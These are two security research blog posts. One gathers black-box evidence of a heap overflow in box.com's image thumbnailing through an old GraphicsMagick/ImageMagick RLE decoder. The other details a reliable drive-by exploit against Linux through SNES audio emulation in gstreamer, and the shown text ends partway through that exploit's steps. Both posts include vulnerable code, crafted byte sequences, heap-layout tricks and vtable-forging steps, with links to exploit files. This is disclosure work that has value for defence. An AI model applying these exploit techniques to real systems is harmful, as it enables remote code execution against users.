Wednesday, March 29, 2017

Black box discovery of memory corruption RCE on box.com

Overview

Robust evidence existed for the presence of a memory corruption based RCE (remote code execution) on box.com servers. The most likely explanation for the evidence presented is the usage of an old ImageMagick which has known vulnerabilities, combined with lack of configuration lockdown. It's hard to be sure, though: see the section on the Box response below.

This blog post explores a different angle to vulnerability research from my normal work. We'll look at how to try and reliably determine the presence or absence of a known server-side memory corruption vulnerability using strictly black box techniques. Black box testing can be fun, because it's very scientific: come up with a hypothesis, devise an experiment, see if the results make sense.

Side notes: box.com security and response

I had a sufficiently unusual experience talking to Box that it's worth a few dedicated notes. I found the experience good in place and awful in others.

The good: the three issues I reported all appeared to get fixed reasonably quickly, including one that was not a simple fix.

The awful: communications were painful, as if they were filtered through a gaggle of PR representatives and an encumbrance of lawyers. The current status is that I believe the issues are fixed -- again via black box testing, but no-one has really confirmed the issues existed in the first place. All I have is some language that says everything is fine and that the security posture was improved, without saying if my reports were accurate or rejected. Being slippery in researcher communications is not the way to build trust in your security program. I also note that Box is behind vs. its competitors due to the lack of a bug bounty program. To avoid a train wreck, open and honest researcher communications need to be addressed prior to the launch of such a program.

It's worth noting that I had an interaction with DropBox for similar reasons, at about the same time (separate blog post pending). The experience could not have been more different! DropBox were friendly, competent and forthcoming. Maybe that's where you want to store your files instead of Box, if security is a priority.

An inaccurate fingerprint

The target of this investigation is image thumbnailing. Online file storage services like Box, DropBox, Google Drive etc. typically support displaying of image thumbnails in the file list and also a preview window. In order to fingerprint the software used, we need to upload a diverse set of files and see if we find any behavioral clues.

In order to "trick" the thumbnailing process into revealing its full capabilities, we use a simple trick of taking unusual file types and renaming them to .png. Often, the thumbnailing process only cares that it thinks it sees a known file extension and then it will stuff the bytes into some process that ignores the file extension and uses header sniffing to work out what to really do.

Very quickly, I found that Box will thumbnail tons of weird and wacky formats. Including the following, and bonus points if you've heard of any: CIN, RLE, MAT, PICT. The list would have probably gone on but when you see a list like that it usually means one of two things.... ImageMagick or GraphicsMagick.

I noticed that a particular CIN file from the GraphicsMagick test set (input_rgb.cin) rendered very differently in my local installs of GraphicsMagick and ImageMagick. In this image below are renderings of the same CIN input file by GraphicsMagick-1.3.23 and ImageMagick-6.8.9. As you can see, GraphicsMagick renders with more extreme contrast.

Unfortunately, I inaccurately decided Box was using GraphicsMagick because the Box thumbnail looked more like the image on the left. This was a very lax determination because there's a lot of color variation depending on the software versions and also the tool and options used to produce or view the thumbnail. We'll correct the mistake later on in this post.

The vulnerability

Under the false belief that GraphicsMagick was in use, I had a look at recently fixed vulnerabilities in GraphicsMagick. The v1.3.24 release notes looked promising (May 2016), because they reference a lot of memory corruption fixes. In addition, my Ubuntu 16.04 LTS has v1.3.23, making testing easy. After a bit of consideration, this GraphicsMagick patch represented a good candidate for exploration. It's a fairly straightforward buffer overflow in the RLE decoder, with good control.

The overflow occurs because of a missed validation on the number of planes (where RGB would be 3 planes, for example) in the canvas allocation vs. the plane number requested to be written in the RLE decode protocol:

    number_pixels=image->columns*image->rows;
...
    rle_pixels=MagickAllocateArray(unsigned char *,number_pixels,
                                   Max(number_planes,4));
...
        case SetColorOp:
          operand=ReadBlobByte(image);
...
          // plane is attacker controlled.
          plane=(unsigned char) operand;
...
        case RunDataOp:
...
          // x, y and plane are attacker controlled. plane is not validated.
          p=rle_pixels+((image->rows-y-1)*image->columns*number_planes)+
            x*number_planes+plane;
          for (i=0; i < (unsigned int) operand; i++)
          {
            if ((y < image->rows) && ((x+i) < image->columns))
              *p=pixel;
            p+=number_planes;
          }

Side note: this is a really unusual image format, the Utah Raster Toolkit RLE (run length encoded) format. Here is a link to the home page, complete with 1990's look. And yes, I did download the original toolkit, apply both patches, and quickly read it for the presence of the same vulnerabilities. It does appear to have them. This software was written in the _1980_'s, so not really reasonable to expect otherwise. Since I'm not sure I ever found a security bug still live from the 80's, might as well assign: CESA-2017-0001.

The oracle

In security, an oracle is simply a measurable result that gives the attacker some useful information. For our oracle, we're simply going to use this: "did the uploaded image thumbnail successfully or not".

There are of course multiple reasons why an image thumbnail might fail. The image might simply not pass a validity check, or the image might cause a SEGV in some backend. Ideally, a backend SEGV would be indicated back to us via a different oracle (perhaps a 50x error code from the HTTP request for the thumbnail). Unfortunately, testing eventually showed that a failed thumbnail, for any reason, manifests to us as:

  • Multiple requests to https://app.box.com/i/f_153109389238/thumbnailURLs over a period of time, leading to a long pause in the UX (throbbing icon) even though this is a "fail fast" case.
  • HTTP response codes of 200 OK.

Starting to construct a proof of vulnerability

To show we're on the right track, we're going to try and build an input file that will thumbnail successfully with the vulnerable code, and fail if the fix is in place. Ideally, the failure will be because of a deterministic check and not a memory corruption failure (which is not particularly deterministic from our vantage point). Let's look at the fixed code:

          p=rle_pixels+((image->rows-y-1)*image->columns*number_planes)+
            x*number_planes+plane;
          for (i=0; i < (unsigned int) operand; i++)
          {
            if ((p >= rle_pixels) && (p < rle_pixels+rle_bytes))
              *p=pixel;
            else
 ThrowRLEReaderException(CorruptImageError,UnableToRunlengthDecodeImage,image);
            p+=number_planes;

As it turns out, there is a subtle difference here that we can use. The vulnerable code lets the p pointer go out of bounds, but stops writing if x or y go out of bounds. The fixed code bails immediately if p goes out of bounds. So we can simply make an image that has a small number of pixels (say, 16x1), and then request a large RLE pixel run (say, 0xff). The vulnerable code will accept this, and clamp the out of bounds values. This is not a case where the vulnerable code will corrupt memory, but it is a case where the vulnerable code will exhibit different behavior. The fixed code will reject this case.

File: gm_intra_oflow_1_3_23.rle
Notes: as a bonus, this file also uses an out-of-bounds plane value. The value is chosen such that any validation would reject it, and also that the out-of-bounds behavior it causes will still remain within the bounds of the pixel buffer.
Result: thumbnailed successfully on Box. Thumbnailed successfully on Ubuntu 16.04's v1.3.23. Fails on v1.3.25. Fails on Ubuntu's ImageMagick v6.8.9.

This is fairly compelling evidence already. For our next test, we could proceed to try and cause a crash via any old heap overflow... but this is not going to be reliable. A crash vs. non crash is going to depend on heap state, which in turn will depend on versions of GraphicsMagick, versions of libc, versions of everything.

A deterministic heap overflow crash

To proceed, we're going to assume that Linux x64 and glibc malloc() might be in use on the backend, and use a quirk of this combination: allocations larger than a certain size (often 128kB or so) are allocated using mmap(). This will provide 4096 byte alignment and size. We can then calculate the size of any mapping created by our input file, and play tricks like writing a single byte past the end. This will either hit the adjacent mapping (may or may not crash depending on writability) or no mapping (crash). Our first attempt is: gm_oflow_mmap_chunk.rle, which tries to write off the end of a large allocation. It's only 24 bytes so let's look at it in its entirety:


This parses as follows:

52 CC:       header
00 00 00 00: top, left at 0x0.
fc 00 04 01: image dimensions 252 x 260
02:          flags 0x02
04:          4 planes (e.g. RGBA)
08:          8 bits per sample
00 00 00 00: no color maps, 0 colormap length, padding, padding
02 fe:       set the plane value to 0xfe
06 ff 41 00: write 0xff pixels of value 0x41
07:          end of image

Result: no crash on my local GraphicsMagick v1.3.23.

We were expecting a crash, so let's look at what happened. valgrind certainly sees the problem, it reports "Invalid write of size 1... 2 bytes after a block of size 262,080". In the debugger, we can confirm the out of bounds write, which happens to cross over into the adjacent mmap chunk which of course happens to be writable (otherwise we would have received a crash). Here are the mappings in question:

7ffff7dd7000-7ffff7dfd000 r-xp 00000000 fc:01 3674897                    /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7edf000-7ffff7fcf000 rw-p 00000000 00:00 0 
7ffff7ff6000-7ffff7ff8000 rw-p 00000000 00:00 0 
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0                          [vvar]

The mapping highlighted in red is actually a concatenation of the mapping we smashed off the end of, and some other mapping. What is that other mapping?

(gdb) x/8xa 0x7ffff7fbf000
0x7ffff7fbf000: 0x4100002b4187d7 0x417ffff141cb21
0x7ffff7fbf010: 0x417ffff14162a8 0x417ffff7415000
0x7ffff7fbf020: 0x4100004a41a988 0x417ffff141bf3b
0x7ffff7fbf030: 0x417ffff141de78 0x417ffff7415000

Well, it's chock full of pointers and you can see we've partially corrupted them by spraying some 0x41 values around. It appears that no used code path dereferences these particular pointers, otherwise we'd have seen a crash. Seems like a great avenue for exploitation, as we can expect this mapping layout to be reasonably repeatable. However, exploitation is not our current goal. Our current goal is to deterministically crash when we go out of bounds. Linux typically uses a top down and first fit algorithm for placing mmap chunks, so if we simply make the allocation bigger, it won't fit in its current place and will go elsewhere.

Our solution is to tweak our image size to be 255 x 16448, still with 4 planes. This causes an allocation of 16776960 bytes. Taking into account the glibc 16 byte header, and rounding the mapping size will be 0x1000000, with the result looking a bit like this:

7ffff0a60000-7ffff1a60000 rw-p 00000000 00:00 0 
7ffff1a60000-7ffff1d38000 r--p 00000000 fc:01 655698                     /usr/lib/locale/locale-archive

As can be seen, our allocation which we smash off the end of now backs up against a read only mapping so any such attempt will crash cleanly. Here's our resulting off-by-one file:

Result: Fails to thumbnail on Box and crashes with SEGV in v1.3.23 locally.

To go into detail on the calculations resulting in an off-by-one condition, let's look at the RLE protocol bytes:

02 f4:       set plane to 0xf4
03 fe:       set X to 254 (default Y is 0, which means bottom)
06 00 41 00: write 1 byte (0x00 + 1) of value 0x41

The calculation of the write offset is (16447 * 255 * 4) + (254 * 4) + 0xf4, which is 0xfffff0. Add in the 16-byte glibc header and the write offset, relative to the start of the mapping, is exactly 0x1000000, which is exactly off-by-one. Here's the crash locally:

=> 0x00007ffff7a7e0af : mov    %r13b,(%rcx)
r13            0x41 65
rcx            0x7ffff1a60000 140737247576064

There are other reasons this file might not thumbnail on Box. A failed thumbnail could be because we hit a backend server that was taking a shower, so we run a few tests across a few days to confirm it consistently fails to thumbnail. Another reason could be the large allocation, if the server has some limits on allocation sizes. So as a final very interesting test, we can change the 0xf4 value in the test file to 0xf3, leading to:

File: gm_oflow_mmap_chunk_oob0.rle
Notes: An off-by-zero file, i.e. writes perfectly at the very end of the mmap() allocation. This write is out-of-bounds regarding the actual size passed to malloc(), but in-bounds regarding the mmap() mapping.
Result: Thumbnails ok on Box and also locally with v1.3.23.

We now have some pretty compelling evidence. By changing a single byte in an input file, which has no effect other than to change an out-of-bounds write offset, we go from consistent success to consistent failure using our thumbnail oracle.

A more accurate fingerprint

In communications with Box, they were quick to deny using GraphicsMagick but very cagey regarding the actual software used. I don't think this was a particularly clever move: image thumbnailing software is fairly easy to fingerprint because each image decoder has its own set of observable decode capability, quirks, bugs and also vulnerabilities. And the inability to have an open conversation likely lowered the amount of benefit obtained.

That said, my hasty and incorrect earlier fingerprint attempt was a minor personal embarrassment, so I set out to more accurately fingerprint the software in use. Given the set of image formats supported, and the denial of usage of GraphicsMagick, the only other reasonable suggestion is ImageMagick. In response to my report, Box disabled all of the crazy / fringe decoders. Good move. One remaining decoder supported is PSD (Adobe Photoshop). In an attempt to fingerprint positively for ImageMagick, here's a PSD file with the following properties:

  • A v2 PSD file: supported by ImageMagick but not GraphicsMagick, gimp, etc.
  • Contains a ZIP (deflate, really) compressed channel. Supported by ImageMagick but not GraphicsMagick.
  • Declares greyscale (1 channel) images but tries to render a magenta pixel by referring to the presumably "out of bounds" green channel. ImageMagick gives an RGB image with magenta pixel, not greyscale!
  • Has deliberately incorrect length / size fields in places where ImageMagick doesn't seem to care.
Result: does not render in GraphicsMagick. Renders a single magenta pixel at offset 2x2 in ImageMagick.

Box: walks like an ImageMagick, quacks like an ImageMagick...

Conclusions

By careful construction of an input file, we've produced strong black box evidence of a memory corruption vulnerability in Box's image thumbnailing process. But we've also determined that Box are not using GraphicsMagick, but likely using ImageMagick instead. Are these two facts compatible? Yes. GraphicsMagick forked from ImageMagick back in 2002. At that time, the codebase was extremely buggy and therefore since 2002, both GraphicsMagick and ImageMagick have suffered from a stream of the same vulnerabilities, with little co-ordination, and patches arriving at very different times.

ImageMagick had the same vulnerability we've been discussing, but it was fixed a couple of years ago. This suggests that Box were running a 2+ years old version of ImageMagick, loaded with vulnerabilities, without any particular attack surface reduction efforts, and without binary ASLR enabled (to be discussed in a future post).

We can also conclude that the split between GraphicsMagick and ImageMagick has led to a bit of a mess. If you look at all the vulnerabilities fixed in GraphicsMagick, not all of them are fixed in ImageMagick and visa versa. This is a potentially great source of bugs; I'm not even sure if you'd call them 0days or 1days.

Tuesday, December 13, 2016

Redux: compromising Linux using... SNES Ricoh 5A22 processor opcodes?!

Overview
TL;DR: full reliable 0day drive-by exploit against Fedora 25 + Google Chrome, by breaking out of Super Nintendo Entertainment System emulation via cascading side effects from a subtle and interesting emulation error. Very full details follow.

[UPDATE 13 Dec 2016 -- a couple of competent readers inform me that I've named the wrong processor! The actual emulated processor where the fault lies is the Sony SPC700, not the Ricoh 5A22. Whoops. The SPC700 is exclusively an audio co-processor. The 5A22, which is not emulated by Game Music Emu, is the main processor.]

I had a lot of fun compromising the Linux desktop using 6502 opcodes on the original Nintendo NES. Would it be possible to have even more fun? Why, yes it would! My previous NES related exploit suffered from multiple fun-limiting issues:

  • Although it was a genuine 0day exploit, it only affected very old Linux distributions. Something affecting bang up to date Linux installs would generate greater lulz.
  • The vulnerability that was abused -- a total lack of bounds checking on memory bank mapping -- was somewhat obvious. More fun can often be had with vulnerabilities that are slightly more subtle.
  • The lack of “super”! The Super Nintendo Entertainment System (SNES) is even more iconic than the original NES. Regarding its 1990 release, Wikipedia notes “the resulting social disturbance led the Japanese government to ask video game manufacturers to schedule future console releases on weekends”. So we need more Super.

Resolving all the above, I present here a full, working, reliable, 0day exploit for current Linux distributions (Ubuntu 16.04 LTS and Fedora 25). It’s a full drive-by download in the context of Fedora. It abuses cascading subtle side effects of an emulation misstep that at first appears extremely difficult to exploit but ends up presenting beautiful and 100% reliable exploitation possibilities.

You’ve likely guessed it by now, but the Linux gstreamer media playback framework supports playback of SNES music files by…. emulating the SNES CPU and audio processor, courtesy of Game Music Emu. How cool is that?

Demo and impact
Today, the demos are videos instead of images. This first video shows a full, reliable drive-by download against Fedora 25 + Google Chrome. The strong reliability of this exploit makes it work inside Fedora’s tracker-extract process, which has highly variable heap state that has frustrated my other exploit attempts. Finally, decent exploit proof of my earlier suspicion that tracker + Google Chrome is very dangerous:


Exploit file: gnome_calc_fedora_25_libc_2.24-3.spc (rename it to .flac to get it to work as in the video).

And this second video shows a couple of different exploitation contexts in Ubuntu 16.04 LTS, using the same exploit file for each. Again, this is showcasing the reliability that the underlying vulnerability permits. The different exploited processes (gnome-video-thumbnailer and totem) have very different heap and threading setups:


Exploit file: xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc (rename it to .mp3 to get it to work as in the video).

Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install -- which I certainly always do. On Fedora, there’s a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file.

As always, the general lack of sandboxing here contributes to the severity. I think we inhabit a world where media parsing sandboxes should be mandatory these days. There’s hope: some of my other recent disclosures appear to have motivated a sandbox for Gnome’s tracker.

Introducing Blargg!
blargg.jpg
A Blargg, in Super Mario World, is a monster that lives in lava. It is also the nickname or handle of the original author of Game Music Emulator, and the handle appears in various macros, e.g.

Ay_Cpu.cpp:#if BLARGG_BIG_ENDIAN

I think this is a wonderful sounding word. In fact it sounds like a Terry Pratchett-esque expletive. Instead of presenting the exploit as a magically working thing, we’ll cover a little of the journey towards the final payloads. On this journey, we’ll make mistakes, and crash into nasty dead ends after following promising leads. Exploits do not magically appear; there is often a lot of undocumented sweat behind them. To deal with these frustrations, we’ll need a suitable expletive. To honor Terry, blarrrgggg!! it is.

Two vulnerabilities
At least two vulnerabilities exist in the core emulation logic of the Ricoh 5A22 processor, which is mostly in Spc_Cpu.h.
The Ricoh 5A22 processor instruction set will look immediately familiar to those who have coded a little bit of 6502 assembly. The 5A22 is based on a 65C816 processor, which is itself based on the 6502. So you’re still looking at a 64kB address space, three main 8-bit registers (A, X and Y), etc. But there are also some new instructions that can affect 16 bits of data, or multiple registers at once (oh the luxury)! There are even instructions to directly perform multiplication and even division.

1: Missing X register value clamp for the MOV (X)+,A instruction
(CESA-2016-0012)
This is one of the new, better-than-6502 instructions. It does two things with the single opcode 0xAF: write the value of the A register to the memory location indicated by the X register, and then increment this X register. The code is simple enough, from Spc_Cpu.h:

       case 0xAF: // MOV (X)+,A
               WRITE_DP( 0, x, a + no_read_before_write  );
               x++;
               goto loop;

And contrast this with the code for the similar opcode 0xBF, which does a read instead of a write:

       case 0xBF:{// MOV A,(X)+
               int temp = x + dp;
               x = (uint8_t) (x + 1);
               a = nz = READ( -1, temp );
               goto loop;

As can be seen, it is normal to clamp the value of the X register to an 8-bit unsigned value, after modifying it in some way. Curiously, the 0xAF opcode appears to be the only place this is missed.

This lack of clamping wouldn’t be a problem, but for the fact that the X register is not defined as a uint8_t on the local stack frame:

       int x = m.cpu_regs.x;

(Various references in the code suggest that this might be for performance because even Intel is slower for non-machine-word-width instructions. Thanks, Intel, I guess?)

At first glance, this appears to be a readily exploitable bug, then. Just hammer out a bunch of 0xAF opcodes in a row and eventually the X register will become so large that the write to the memory location referred to by X will be out of bounds. If only it were that simple. We’ll revisit this in the next section.

2: Missing SP register value clamp for the RET1 instruction
(CESA-2016-0013)
This is another new instruction that does a couple of things: first it restores the flags register from the stack and then restores the instruction pointer from the stack, like this:

       case 0x7F: // RET1
               temp = *sp;
               SET_PC( GET_LE16( sp + 1 ) );
               sp += 3;
               goto set_psw;

Again, this code is curious because it appears to be the only modification of the SP register that does not implement appropriate clamping. The SP register is supposed to range from 0x00 to 0xff, representing “next push” stack pointer positions of virtual memory addresses 0x100 - 0x1ff. The sp local variable actually maintains the stack pointer as a raw host heap uint8_t* pointer. So by setting SP to 0xff and then issuing opcode 0x7F, we end up with an effective SP register value of 0x102. Furthermore, once you’ve over-incremented the SP register, further stack pushes and pops do not get stopped. The code only checks for the exact SP wrap around boundary values, for example for a PUSH:

#define PUSH( data )\
{\
       *--sp = (uint8_t) (data);\
       if ( sp - ram == 0x100 )\
               sp += 0x100;\
}

So we can also envisage that this is a very exploitable bug: use RET1 to get the stack pointer out of bounds; then use POPs to increment the stack pointer until it gets somewhere interesting in the host heap -- using the POPped stack values to leak host heap pointers etc.; then use PUSHes to overwrite host heap structures and pointers, perhaps with values calculated from the leaky POPs.

Well, let’s going and see if things end up so simple. (Hint: no.)

3: Note on equivalence
(Not a vulnerability per-se, just an observation.)
It’s worth noting that these two separate vulnerabilities are likely to have largely equivalent impact. If we can get an out-of-range SP register value, we can transfer it to the X register to get an out-of-range X register value, and visa versa. This is courtesy of the MOV X,SP and MOV SP,X instructions:

       case 0x9D: // MOV X,SP
               x = nz = GET_SP();
               goto loop;

       case 0xBD: // MOV SP,X
               SET_SP( x );
               goto loop;

Exploitation impediments
Ok, let’s proceed with exploitation of the MOV (X)+,A issue. This should be a straightforward buffer overflow. We typically start by proving the presence of the underlying vulnerability by triggering a crash. So let’s just execute the following sequence in a test SPC file:

AF 2F FD:
here:
 MOV (X)+,A
 BRA here

Little tests like this can be cooked up by putting the desired opcode sequence at offset 0x100 in this skeleton file: skeleton.spc.

And no crash. What the blarrgg? Upon investigation in the debugger, we see that the X register definitely gets way larger than 0xff, and values are written in virtual address space at offsets greater than 0xff, but then the writes stop.

What is going on here relates to audio chunk processing. In order to synchronize the processor and the audio generation, the processor is run for a little bit (typically 32768 cycles) and then the audio generator routine is run to generate waveforms based on whatever values the CPU has been banging into the audio hardware registers. All fine so far. But in between these little 32768 cycle runs of CPU, the CPU register state is saved to the heap and then restored to stack variables next time around. Here’s the code that implements saving to heap:

       m.cpu_regs.pc = (uint16_t) GET_PC();
       m.cpu_regs.sp = ( uint8_t) GET_SP();
       m.cpu_regs.a  = ( uint8_t) a;
       m.cpu_regs.x  = ( uint8_t) x;
       m.cpu_regs.y  = ( uint8_t) y;

BLARRRRGG!!!! Well, we see that SP and X register clamping is implemented here. In effect, this means that we have a finite CPU cycle budget within which we have to cause our out-of-bounds register and then abuse some side effect of that.

We can live with this. Instead of using the MOV (X)+,A instruction to tediously increment the X register all the way past 0xffff (which is where the write to X will bust out of virtual CPU addresses and hopefully into the host heap), we can use the instruction only for the purposes of generating a large X register value. And we can then use a different side effect of a large X register, with this instruction:

D5 FF FF:
 MOV 0xFFFF+X,A

The astute reader will note that this instruction would already appear dangerous even with in-bounds values of the X register. Taking the largest in-bounds value of 0xff, this would appear to write to virtual address 0x100fe, which is out-of-bounds. Well, looking at the runtime data structure in Snes_Spc.h, we see this is taken care of with the concept of padding:

       struct state_t
       {
...
               struct
               {
                       // padding to neutralize address overflow
                       union {
                               uint8_t padding1 [0x100];
                               uint16_t align; // makes compiler align data for 16-bit access
                       } padding1 [1];
                       uint8_t ram      [0x10000];
                       uint8_t padding2 [0x100];
               } ram;
       };
       state_t m;

So we definitely need an out-of-bounds X register value. Let’s try again to get a heap overflow crash, with this program:

CD FF E8 41 AF D5 FF FF 2F FA:
 MOV X,#0xFF
 MOV A,#0x41
here:
 MOV (X)+,A
 MOV 0xFFFF+X,A
 BRA here


…. and no crash? What the blarrggity blarrrggg? The extent of our bad luck becomes apparent with a bit of debugging under the test binary we are using, gst-play-1.0. It turns out that the heap in the thread arena for the decoding looks like this:

| header | stuff | stuff | SPC decoder |m| file data | free | PROT_NONE |

This layout is stable and it makes sense: the SPC decoder object is 70792 bytes. This is too small to be allocated with mmap(), but big enough that there is very unlikely to be a heap “hole” to satisfy the allocation request. Therefore, it will go at the end of the heap arena when it is allocated. In the case of gst-play-1.0, there is a subsequent allocation, of ~64kB, where the input file data is stored. This again is a large allocation so will go after the SPC decoder object at the end of the heap. There is no advantage to corrupting into the input file data; it is just a sequence of characters, no pointers and the attacker already has control over the content of the input file. And the input file data is large, so we do not have enough CPU cycles in our budget to corrupt past this allocation and mess with the top of heap chunk (av->top in glibc malloc terms).

So our sole option is to corrupt the 8 byte size + flags value (in red above) that lives between the heap chunks containing the SPC decoder object and the input file data. This will be tough! Not to say it is impossible, but the last time I tried to exploit glibc metadata corruption in a decent ASLR environment, I found it hard enough that I had to pull some tricks to “cheat” a little. We do not like this path, then. In fact, the situation is even more dire for two reasons:

  • Corruption of the size value is verified in the debugger as occurring but is not causing a crash.
    It turns out that the gstreamer decoder wrapper for libgme contains a bug. If the decoding starts successfully, then gme_delete() is never called and the chunks surrounding the corrupted value are never freed. A memory leak. Unbelieveable and BLARRRRGGGGG! (Reference: lack of gme_delete() call in gst_gme_dec_dispose(), gstgme.c)
  • Even though we wrote the byte value 0x41 to our out-of-bounds locations, the debugger shows that in fact, 0xff was written instead. Eh? It turns out that Snes_Spc::cpu_write() function has logic to preserve the “padding” bytes, that we briefly mentioned above, as 0xff values. So, if a virtual address >= 0x10000 is written, the logic is:
    1. Write the value to the host heap: RAM [addr] = (uint8_t) data;
    2. If the written address was >= 0x10000, put the 0xff value back, in cpu_write_high(): RAM [i + rom_addr] = cpu_pad_fill; // restore overwritten padding
    3. Also if written address was >= 0x10000, subtract 0x10000 and do the write again, effectively providing standard “wrap around” semantics at the address space boundary: cpu_write( data, i + rom_addr - 0x10000, time );

The heap situation looks a little better inside the totem video player process because the input file data is allocated in some other heap thread arena. So the SPC decoder object is right against the end of allocated memory in the area and we get to corrupt the av->top “top of memory” value. But that’s still not hugely useful in this instance because there is very little heap activity going on in the decode thread during decode.

Summary: after starting with two very promising looking vulnerabilities, situation is looking very grim.

Cascading the vulnerability
We’re running out of options. But is it possible that there are other side effects to having an out-of-bounds X register value, other than directly writing out of bounds? With this question at the front of our mind, a careful re-read of all the opcodes does turn up some ideas.

Cascading side effect #1: MUL
Although most operations on the A, X and Y registers clamp the resulting values carefully, the very interesting new multiply instruction, MUL, does not:

       case 0xCF: { // MUL YA
               unsigned temp = y * a;
               a = (uint8_t) temp;
               nz = ((temp >> 1) | temp) & 0x7F;
               y = temp >> 8;
               nz |= y;
               goto loop;

This instruction takes two 8-bit values in the Y and A registers, and multiplies them together. The 16-bit result is split into a high and low 8-bit result value, again stored in the Y and A registers. Neat little instruction! Note how the A result value is clamped to uint8_t but the Y result value is not. That’s actually strictly correct: multiplying two unsigned 8-bit values has a largest result of 0xff * 0xff == 0xfe01, which would leave Y==0xfe, which does not need further clamping.

However, we have a couple of tricks to generate 8-bit register values that are out of bounds. We can increment X past 0xff and then transfer the X value to the A and / or Y registers, and then enter the multiply. With this corrupt input state, the lack of clamping of the Y value allows us to generate much larger out-of-range register values without needing too many instructions. In effect, we can exponentiate the out-of-bounds values. The instruction count limit we are operating under no longer seems so onerous.

Example: let’s say we use the 0xAF opcode trick to increment the X register to the value 512. Now, we can use the MOV A,X and then MOV Y,A instructions to move the value 512 into the A and Y registers. Using MUL then leaves 1024 in the X register. Repeating the trick, we get 4096 in the X register. Do it again and we get 65536. These numbers are getting bigger fast!

However… since the multiplication is done in an unsigned variable, and the result is right shifted by 8, the largest value we’ll ever get using this trick is 2^24 - 1, or about 16MB. (To get there or near there, we’ll need to avoid integer overflow at 65536 * 65536, perhaps by starting the multiplication series with a slightly smaller value. We’ll deal with it later.)

Is this useful? Unfortunately, thread heap arenas are 64MB in size, e.g.:

7fffbc000000-7fffbc16a000 rw-p 00000000 00:00 0
7fffbc16a000-7fffc0000000 ---p 00000000 00:00 0

So that 16MB “reach” is only going to crash when it smashes into that mapped but PROT_NONE area of reserved but unused thread heap arena. Blarrggg…..

(Sample file: crash_oob_write.spc)

Cascading side effect #2: DIV
So now we have potentially very large values in the X register. Is there another chained side effect we can abuse? Or are we running out of rope here? It turns out that there’s one last hope: the DIV instruction is just as interesting as the MUL one. It also does transforms on the values of incoming registers, leaving the results in the A and Y registers, without any clamping on the Y result. Here’s the code:

       case 0x9E: // DIV YA,X
       {
               unsigned ya = y * 0x100 + a;
...
               if ( y < x * 2 )
               {
                       a = ya / x;
                       y = ya - a * x;
               }
               else
               {
                       a = 255 - (ya - x * 0x200) / (256 - x);
                       y = x   + (ya - x * 0x200) % (256 - x);
               }
...
               a = (uint8_t) a;

Even though this code is fairly simple, I don’t claim to understand it 100%, particularly with large input values. What I do know is that I see various integer overflow opportunities, integer underflow opportunities, less useful div-by-zero issues, etc. If I’m being honest here, I copied the code into a simple .c file and plugged in various A, X and Y register input values to see what dropped out. I focussed on experimenting with “clean” input values that are powers of two, or one greater or less than that. And hey presto with a bit of experimentation, I found this:

Input: A = 0, X = 257, Y = 16777215
Output: A = 255, X = 257, Y = -131583

A negative value!! This has the potential to change everything. The use of the int type for the registers isn’t just about width, it’s about signedness. A negative value is awesome for us for two reasons:

  • A negative value, when added to the base pointer for the virtual RAM, will be sign extended to 64-bits and therefore reference before the virtual RAM on the heap. This gets us past the serious problem that there is very little of interest after the virtual RAM.
  • Looking again at Snes_Spc::cpu_write, a negative address value will avoid the logic that decides to restore padding values. It will also avoid logic that tries to “wrap around” address space writes.

Surely we can move an exploit forward now?

100% reliable exploitation
The virtual RAM is not allocated with a separate malloc() call; it’s a member array of a larger C++ object, the key parts of which are here:

class Spc_Emu : public Music_Emu {  // base class defines virtual methods
...
       Snes_Spc apu;
}
struct Snes_Spc {
       Spc_Dsp dsp;
       struct state_t
       {
...
               int         extra_clocks;
               sample_t*   buf_begin;
               sample_t const* buf_end;
               sample_t*   extra_pos;
               sample_t    extra_buf [extra_size];
...
               struct
               {
                       // padding to neutralize address overflow
                       union {
                               uint8_t padding1 [0x100];
                               uint16_t align; // makes compiler align data for 16-bit access
                       } padding1 [1];
                       uint8_t ram      [0x10000];
                       uint8_t padding2 [0x100];
               } ram;
       };
       state_t m;
}
struct Spc_Dsp {
       struct state_t
       {
...
              uint8_t* ram; // 64K shared RAM between DSP and SMP

All of the above fields are located within the same heap chunk because they are part of the same object. We are starting to realize that this is an exceptionally beautiful vulnerability because we can use our negative X register to index backwards, and access the following fields without the unreliability of crossing a heap chunk:

  • A vtable value. We can read it to defeat ASLR by calculating the address of various code and data sections relative to it. We can write it to direct code execution.
  • A pointer value to the actual host heap memory address of the virtual RAM (Spc_Dsp::ram). This is pretty spectacular. We can now consider forging a vtable inside the virtual CPU address space… and then we know what address to overwrite the vtable pointer with so that our malicious vtable is cleanly referenced.
  • Some sample buffering and timing fields that give us a bit of control over reads and writes outside of the main Spc_Emu object, if we need that.

(Sample file: perfect_vtable.spc. Forges a vtable inside virtual RAM and causes a fault trying to execute the string “xcalc” at a known address. Highly process, heap state and Linux distro independent.)

Memcpy fail
My first attempt to put all this together in an exploit on Ubuntu used one of my standard tricks: overwriting the memcpy() GOT entry with system() and then triggering some memcpy() in the code. At first glance, there’s an excellent trigger opportunity by having the virtual CPU write to a hardware register to enable or disable a small window of ROM:

void Snes_Spc::enable_rom( int enable )
{
       if ( m.rom_enabled != enable )
       {
               m.rom_enabled = enable;
               if ( enable )
                       memcpy( m.hi_ram, &RAM [rom_addr], sizeof m.hi_ram );
               memcpy( &RAM [rom_addr], (enable ? m.rom : m.hi_ram), rom_size )

Importantly, if memcpy() is rewired to system(), we just need control of the memory content referenced by the first parameter. Since the second memcpy() is copying to virtual RAM, we trivially have this control.

And I had working exploit along these lines in my debug build, that promptly failed in a real build of libgme.so. What the actual blarrggg?? It turns out that the optimizing compiler decides that since the copy length is a small-ish constant, it will expand these memcpy() calls to inline sequences of reads and writes. Great. Still, a plan B isn’t hard. Also, as noted in previous blog posts, this technique will work on Ubuntu but not Fedora, since the latter has stronger exploit mitigations turned on, including RELRO. In the next section, we’ll pursue something that will work on both Ubuntu on Fedora.

Putting it together
We have all the pieces and information to put together a decent exploit now. Here’s how the exploit works that you saw in the video. We’ll describe the Fedora variant:

1: Set the X register to 255 and then use opcode 0xAF (MOV (X)+,A) in a loop to bump it up to 511
